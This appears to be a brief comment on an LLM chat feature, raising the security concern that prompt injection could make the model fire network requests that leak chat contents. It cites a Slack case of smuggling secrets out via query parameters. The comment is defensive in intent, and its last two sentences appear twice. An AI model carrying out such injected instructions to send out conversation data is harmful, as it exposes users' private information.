My assumption was that the reason this wasn't already implemented was due to security concerns, that via prompt injection, elements of the chat could be leaked by any feature that causes the LLM to even by side effect cause a network request to be fired.
Much like the Slack issue of smuggling chat secrets out via query parameters.
Has that been considered at all here, or is it on the user to vet the models suggestions?
Much like the Slack issue of smuggling chat secrets out via query parameters.
Has that been considered at all here, or is it on the user to vet the models suggestions?